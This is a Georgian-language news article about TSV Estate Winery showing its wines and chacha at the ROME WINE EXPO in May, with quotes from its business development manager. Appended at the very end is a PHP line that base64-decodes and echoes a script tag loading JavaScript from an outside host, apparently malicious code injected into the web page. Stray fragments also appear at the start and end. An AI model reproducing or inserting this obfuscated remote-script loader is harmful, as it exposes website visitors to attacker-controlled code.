celsiusi
ავერსი შნაიდერი
„მეღვინეობა თიესვი”  TSV Estate Winery რომის საერთაშორისო ექსპოზე ქართული ღვინით იყო წარმოდგენილი . ამის შესახებ, საინფორმაციო სააგენტო  BUSINESS TIME-ს  TSV Estate Winery–ის ბიზნესის განვითარების მენეჯერმა ეკა კვირტიამ განუცხადა.
 
მისივე განცხადებით,  იტალიაში , ქალაქ რომში  სააგენტო რიზერვა გრანდეს ( Riserva Grande) მიერ ორგანიზებული ღვინის საერთაშორისო გამოფენა ROME WINE EXPO  20-24 მაისს გაიმართა , სადაც წელს პირველად ჩაერთნენ ქართული ღვინის მწარმოებლები.
 
„კომპანიის პრეზიდენტის, თიკა სვანიძე ვენკოს მონაწილეობით გაიმართა ქართული ღვინის მასტერკლასი, რომელზეც კომპანიის დამფუძნებელმა, იტალიურ საზოგადოებას წარუდგინა „მეღვინეობა თიესვის”  ღვინო “მეფის რჩეული“ . – განაცხადა ეკა კვირტიამ. 
 
 
მან, ასევე აღნიშნა, რომ 20 მაისს გამართული ღონისძიების საზეიმო გახსნაზე,  წარმოდგენილი იყო  რჩეული იტალიური ღვინოები, რომელთა დაგემოვნებას და  შეფასებას დარგის წამყვანი სპეციალისტები ახორციელებდნენ.  ამასთან, სპეციალურად შერჩეულ იქნა „მეღვინეობა თიესვის”   ორი სახეობის „მეფის რჩეულის“ ხაზის კლასიკური და მუხის ჭაჭა, რომელთა დეგუსტაცია საგანგებოდ მოწვეული დარგის სპეციალისტებისთვის, სომელიეებისთვის და ღვინის ბლოგერებისთვის გაიმართა. 
 
 
 „ ჩვენთვის ძალზე მნიშვნელოვანია, რომ „მეღვინეობა თიესვის”  ჭაჭამ იტალიაში , „გრაპას“ სამშობლოში უმაღლესი შეფასებები დაიმსახურა. „მეღვინეობა თიესვი”  სადეგუსტაციო დახლებზე 6 სახეობის ღვინით იყო წარმოდგენილი, კომპანიის მიერ წარმოებულმა ქვევრის და კლასიკურმა ღვინოებმა მოწვეული სტუმრების დიდი ინტერესი და აღფრთოვანება გამოიწვია. კომპანიისთვის ძალიან საინტერესო იყო პოტენციურ მყიდველებთან , სარესტორნო და სასტუმროს ბიზნესის წარმომადგენლებთან შეხვედრა. იტალია საინტერესო  ბაზარს წარმოადგენს ქართული ღვინისთვის და მსგავსი ტიპის საერთაშორისო გამოფენები, მცირე მარნებისთვის ბაზრის დივერსიფიკაციისთვის საჭირო ახალი შესაძლებლობების აღმოჩენაა.
 
აღსანიშნავია, რომ  მსგავსი ღონისძიებები ძალზე მნიშვნელოვანია ქართული ღვინის შესახებ ცნობადობის გაზრდის კუთხით. განსაკუთრებით კი იტალიაში, სადაც ქართული ღვინის შესახებ ცნობადობა ძალიან დაბალია. უნიკალური ტექნოლოგია და ათასწლეულების განმავლობაში შენარჩუნებული ღვინის წარმოების უწყვეტი ტრადიცია , ქართულ ღვინოს განსაკუთრებულ , ნიშურ სეგმენტში წარმოჩენის საშუალებას აძლევს, მაგრამ ამ კუთხით უფრო აქტიური მუშაობა არის საჭირო. 
 
მინდა აღვნიშნო, რომ გამოფენას ასევე ესწრებოდა საქართველოს საგანგებო და სრულუფლებიანი ელჩი იტალიის რესპუბლიკაში, ბატონი კონსტანტინე სურგულაძე, იტალიაში საქართველოს საელჩოს და ასევე ვატიკანში საქართველოს საელჩოს წარმომადგენლები. ქართული მხარის გამოფენაში ჩართულობას კოორდინაციას უწევდა იტალიაში მოღვაწე ქართველი სომელიე, ქალბატონი თამარ ჭიჭიბოშვილი.“– განმარტა მენეჯერმა.
 
 
 
837
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");